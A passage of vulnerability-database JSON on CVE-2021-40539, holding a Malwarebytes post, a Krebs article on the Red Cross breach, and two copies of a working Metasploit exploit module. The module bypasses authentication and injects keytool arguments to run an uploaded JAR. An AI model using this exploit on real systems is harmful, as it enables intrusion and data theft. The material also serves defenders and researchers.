list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. 
The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. 
The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are 3 vulnerabilities that are commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>): [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control** with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. 
Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-2685](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014"This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443."\n\nWhile the CVE description is the same for the 4 CVE\u2019s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. 
Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. 
An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. 
When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these "requirements" move it to the top of your "to-patch" list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-2685", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": 
"https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-11-27T05:17:02", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-27T00:00:00", "type": "packetstorm", "title": "ManageEngine ADSelfService Plus Authentication Bypass / Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-27T00:00:00", "id": "PACKETSTORM:165085", "href": "https://packetstormsecurity.com/files/165085/ManageEngine-ADSelfService-Plus-Authentication-Bypass-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this \ninclude 
Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539', \n'Description' => %q{ \nThis module exploits CVE-2021-40539, a REST API authentication bypass \nvulnerability in ManageEngine ADSelfService Plus, to upload a JAR and \nexecute it as the user running ADSelfService Plus - which is SYSTEM if \nstarted as a service. \n}, \n'Author' => [ \n# Discovered by unknown threat actors \n'Antoine Cervoise', # Independent analysis and RCE \n'Wilfried B\u00e9card', # Independent analysis and RCE \n'mr_me', # keytool classloading technique \n'wvu' # Initial analysis and module \n], \n'References' => [ \n['CVE', '2021-40539'], \n['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'], \n['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'], \n['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'], \n['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py'] \n], \n'DisclosureDate' => '2021-09-07', \n'License' => MSF_LICENSE, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, # true if ADSelfService Plus is run as a service \n'Targets' => [ \n['Java Dropper', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8888 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'vars_post' => { \n'methodToCall' => 'previewMobLogo' \n} \n) \n \nunless res \nreturn CheckCode::Unknown('Target failed to respond to 
check.') \nend \n \nunless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg}) \nreturn CheckCode::Safe('Failed to bypass REST API authentication.') \nend \n \nCheckCode::Vulnerable('Successfully bypassed REST API authentication.') \nend \n \ndef exploit \nupload_payload_jar \nexecute_payload_jar \nend \n \ndef upload_payload_jar \nprint_status(\"Uploading payload JAR: #{jar_filename}\") \n \njar = payload.encoded_jar \njar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh \n \nform = Rex::MIME::Message.new \nform.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"') \nform.add_part('yas', nil, nil, 'form-data; name=\"Save\"') \nform.add_part('smartcard', nil, nil, 'form-data; name=\"form\"') \nform.add_part('Add', nil, nil, 'form-data; name=\"operation\"') \nform.add_part(jar.pack, 'application/java-archive', 'binary', \n%(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\")) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'ctype' => \"multipart/form-data; boundary=#{form.bound}\", \n'data' => form.to_s \n) \n \nunless res&.code == 404 \nfail_with(Failure::NotVulnerable, 'Failed to upload payload JAR') \nend \n \n# C:\\ManageEngine\\ADSelfService Plus\\bin (working directory) \nregister_file_for_cleanup(jar_filename) \n \nprint_good('Successfully uploaded payload JAR') \nend \n \ndef execute_payload_jar \nprint_status('Executing payload JAR') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'), \n'vars_post' => { \n'methodToCall' => 'openSSLTool', \n'action' => 'generateCSR', \n# https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html \n'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\" \n} \n) \n \nunless res&.code == 404 \nfail_with(Failure::PayloadFailed, 'Failed to execute payload JAR') \nend 
\n \nprint_good('Successfully executed payload JAR') \nend \n \ndef jar_filename \n@jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\" \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165085/manageengine_adselfservice_plus_cve_2021_40539.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2022-02-16T19:27:08", "description": "A network intrusion at the **International Committee for the Red Cross** (ICRC) in January led to the theft of personal information on more than 500,000 people receiving assistance from the group. KrebsOnSecurity has learned that the email address used by a cybercriminal actor who offered to sell the stolen ICRC data also was used to register multiple domain names the FBI says are tied to a sprawling media influence operation originating from Iran.\n\n\n\nOn Jan. 19, the ICRC disclosed the compromise of servers hosting the personal information of more than 500,000 people receiving services from the [Red Cross and Red Crescent Movement](<https://en.wikipedia.org/wiki/International_Red_Cross_and_Red_Crescent_Movement>). The ICRC said the hacked servers contained data relating to the organization's **Restoring Family Links** services, which works to reconnect people separated by war, violence, migration and other causes.\n\nThe same day the ICRC went public with its breach, someone using the nickname "**Sheriff**" on the English-language cybercrime forum **RaidForums** advertised the sale of data from the Red Cross and Red Crescent Movement. Sheriff's sales thread suggests the ICRC was asked to pay a ransom to guarantee the data wouldn't be leaked or sold online.\n\n"Mr. Mardini, your words have been heard," Sheriff wrote, posting a link to the Twitter profile of **ICRC General Director Robert Mardini** and urging forum members to tell him to check his email. 
"Check your email and send a figure you can pay."\n\n\n\nRaidForums member "unindicted" aka Sheriff selling access to the International Red Cross and Red Crescent Movement data. Image: Ke-la.com\n\nIn their [online statement about the hack](<https://www.icrc.org/en/document/cyber-attack-icrc-what-we-know>) (updated on Feb. 7) the ICRC said it had not had any contact with the hackers, and no ransom demand had been made.\n\n"In line with our standing practice to engage with any actor who can facilitate or impede our humanitarian work, we are willing to communicate directly and confidentially with whoever may be responsible for this operation to impress upon them the need to respect our humanitarian action," the ICRC statement reads.\n\nAsked to comment on Sheriff's claims, the ICRC issued the following statement:\n\n"Right now, we do not have any conclusive evidence that this information from the data breach has been published or is being traded. Our cybersecurity team has looked into any reported allegation of data being available on the dark web."\n\n**Update, 2:00 p.m., ET:** The ICRC just published an update to its [FAQ on the breach](<https://www.icrc.org/en/document/cyber-attack-icrc-what-we-know>). The ICRC now says the hackers broke in on Nov. 9, 2021, using an unpatched critical vulnerability (CVE-2021-40539). "This vulnerability allows malicious cyber actors to place web shells and conduct post-exploitation activities such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files. Once inside our network, the hackers were able to deploy offensive security tools which allowed them to disguise themselves as legitimate users or administrators. 
This in turn allowed them to access the data, despite this data being encrypted."\n\n_Original story:_\n\nThe email address that Sheriff used to register at RaidForums -- **kelvinmiddelkoop@hotmail.com** -- appears in [an affidavit for a search warrant filed by the FBI](<https://www.justice.gov/usao-ndca/press-release/file/1334571/download>) roughly a year ago. That FBI warrant came on the heels of [an investigation published by security firm **FireEye**](<https://www.mandiant.com/resources/report-suspected-iranian-influence-operation>), which examined an Iranian-based network of inauthentic news sites and social media accounts aimed at the United States, U.K. and other western audiences.\n\n"This operation is leveraging a network of inauthentic news sites and clusters of associated accounts across multiple social media platforms to promote political narratives in line with Iranian interests," FireEye researchers wrote. "These narratives include anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as support for specific U.S. policies favorable to Iran."\n\n\n\nThe FBI says the domains registered by the email address tied to Sheriff's RaidForums account were used in service of the Liberty Front Press, a network of phony news sites thought to originate from Iran.\n\nAccording to the FBI affidavit, the address kelvinmiddelkoop@hotmail.com was used to register at least three different domains for phony news sites, including awdnews[.]com, sachtimes[.]com, and whatsupic[.]com. A reverse WHOIS search on that email address at [DomainTools.com](<https://www.domaintools.com>) (an advertiser on this site) shows it was used to register 17 domains between 2012 and 2021, including moslimyouthmedia[.]com, moslempress[.]com, and realneinovosti[.]net.\n\nA review of Sheriff's postings to RaidForums reveals he has used two other nicknames since registering on the forum in December 2021: "**Unindicted**," and "**threat_actor**." 
In several posts, Sheriff taunts one FireEye employee by name.\n\nIn a Jan. 3, 2022 post, Sheriff says their "team" is seeking licenses for the Cobalt Strike penetration testing tool, and that they're prepared to pay $3,000 - $4,000 per license. Cobalt Strike is a legitimate security product that is sold only to vetted partners, but compromised or ill-gotten Cobalt Strike licenses [frequently are used in the run-up to ransomware attacks](<https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks>).\n\n"We will buy constantly, make contact," Sheriff advised. "Do not ask if we still need)) the team is interested in licenses indefinitely."\n\nOn Jan. 4, 2022, Sheriff tells RaidForums that their team is in need of access to a specific data broker platform, and offers to pay as much as $35,000 for that access. Sheriff says they will only accept offers that are guaranteed through the forum's escrow account.\n\nThe demand for escrow in a sales thread is almost universally a sign that someone means business and they are ready to transact on whatever was advertised or requested. That's because escrow transactions necessarily force the buyer to make a deposit with the forum's administrators before proceeding on any transaction.\n\nSheriff appears to have been part of a group on RaidForums that [offered to buy access to organizations that could be extorted with ransomware or threatened with the publication of stolen data](<https://krebsonsecurity.com/wp-content/uploads/2022/02/kela-scrape.pdf>) (PDF screenshot from threat intelligence firm [KELA](<https://ke-la.com>)). In a "scam report" filed against Sheriff by another RaidForums member on Dec. 31, 2021, the claimant says Sheriff bought access from them and agreed to pay 70 percent of any ransom paid by the victim organization.\n\nInstead, the claimant maintains, Sheriff only paid them roughly 25 percent. 
"The company pay $1.35 million ransom and only payment was made of $350k to me, so i ask for $600k to fix this dispute," the affiliate wrote.\n\nIn another post on RaidForums, a user aptly named "FBI Agent" advised other denizens to steer clear of Sheriff's ransomware affiliate program, noting that transacting with this person could run afoul of sanctions from the U.S. Department of the Treasury's **Office of Foreign Assets Control** (OFAC) that restrict commerce with people residing in Iran.\n\n"To make it clear, we don't work with individuals under the OFAC sanctions list, which @Sheriff is under," the ransomware affiliate program administrator wrote in reply.\n\nRaidForums says Sheriff was referred to the forum by **Pompompurin**, the same hacker who used a security hole in the FBI's website last year [to blast a phony alert about a cybercrime investigation to state and local authorities](<https://krebsonsecurity.com/2021/11/hoax-email-blast-abused-poor-coding-in-fbi-website/>). Pompompurin has been quite active on RaidForums for the past few years, frequently posting databases from newly-hacked organizations, and [selling access to stolen information](<https://www.securityweek.com/fbi-hacker-offers-sell-data-allegedly-stolen-robinhood-breach>).\n\nReached via Twitter, Pompompurin said they had no idea who might have offered money and information on Sheriff, and that they would never "snitch" on Sheriff.\n\n"I know who he is but I'm not saying anything," Pompompurin replied.\n\nThe information about Sheriff was brought to my attention by an anonymous person who initially contacted KrebsOnSecurity saying they wanted to make a donation to the publication. 
When the person offering the gift asked if it was okay that the money came from a ransomware transaction, I naturally declined the offer.\n\nThat person then proceeded to share the information about the connection between Sheriff's email address and the FBI search warrant, as well as the account's credentials.\n\nThe same identity approached several other security researchers and journalists, one of whom was able to validate that the kelvinmiddelkoop@hotmail.com address actually belonged to Sheriff's account. Those researchers were likewise offered tainted donations, except the individual offering the donation seemed to use a different story with each person about who they were or why they were offering money. Others contacted by the same anonymous user said they also received unsolicited details about Sheriff.\n\nIt seems clear that whoever offered that money and information has their own agenda, which may also involve attempts to make members of the news media appear untrustworthy for agreeing to accept stolen funds. 
However, the information they shared checks out, and since there is precious little public reporting on the source of the ICRC intrusion, the potential connection to hacker groups based in Iran seems worth noting.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-16T16:44:19", "type": "krebs", "title": "Red Cross Hack Linked to Iranian Influence Operation?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2022-02-16T16:44:19", "id": "KREBS:69ADDAD13D83673CDE629B3AD655DD29", "href": "https://krebsonsecurity.com/2022/02/red-cross-hack-linked-to-iranian-influence-operation/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T08:36:53", "description": "This module exploits CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and execute it as the user running ADSelfService Plus - which is SYSTEM if started as a service.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": 
"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-24T01:05:09", "type": "metasploit", "title": "ManageEngine ADSelfService Plus CVE-2021-40539", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-24T16:44:59", "id": "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',\n 'Description' => %q{\n This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is SYSTEM if\n 
started as a service.\n },\n 'Author' => [\n # Discovered by unknown threat actors\n 'Antoine Cervoise', # Independent analysis and RCE\n 'Wilfried B\u00e9card', # Independent analysis and RCE\n 'mr_me', # keytool classloading technique\n 'wvu' # Initial analysis and module\n ],\n 'References' => [\n ['CVE', '2021-40539'],\n ['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],\n ['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],\n ['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],\n ['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']\n ],\n 'DisclosureDate' => '2021-09-07',\n 'License' => MSF_LICENSE,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true if ADSelfService Plus is run as a service\n 'Targets' => [\n ['Java Dropper', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8888\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'vars_post' => {\n 'methodToCall' => 'previewMobLogo'\n }\n )\n\n unless res\n return CheckCode::Unknown('Target failed to respond to check.')\n end\n\n unless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg})\n return CheckCode::Safe('Failed to bypass REST API authentication.')\n end\n\n CheckCode::Vulnerable('Successfully bypassed REST API authentication.')\n end\n\n def exploit\n upload_payload_jar\n execute_payload_jar\n end\n\n def upload_payload_jar\n print_status(\"Uploading payload JAR: 
#{jar_filename}\")\n\n jar = payload.encoded_jar\n jar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh\n\n form = Rex::MIME::Message.new\n form.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"')\n form.add_part('yas', nil, nil, 'form-data; name=\"Save\"')\n form.add_part('smartcard', nil, nil, 'form-data; name=\"form\"')\n form.add_part('Add', nil, nil, 'form-data; name=\"operation\"')\n form.add_part(jar.pack, 'application/java-archive', 'binary',\n %(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\"))\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'ctype' => \"multipart/form-data; boundary=#{form.bound}\",\n 'data' => form.to_s\n )\n\n unless res&.code == 404\n fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')\n end\n\n # C:\\ManageEngine\\ADSelfService Plus\\bin (working directory)\n register_file_for_cleanup(jar_filename)\n\n print_good('Successfully uploaded payload JAR')\n end\n\n def execute_payload_jar\n print_status('Executing payload JAR')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'),\n 'vars_post' => {\n 'methodToCall' => 'openSSLTool',\n 'action' => 'generateCSR',\n # https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html\n 'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\"\n }\n )\n\n unless res&.code == 404\n fail_with(Failure::PayloadFailed, 'Failed to execute payload JAR')\n end\n\n print_good('Successfully executed payload JAR')\n end\n\n def jar_filename\n @jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\"\n end\n\nend\n", "sourceHref": 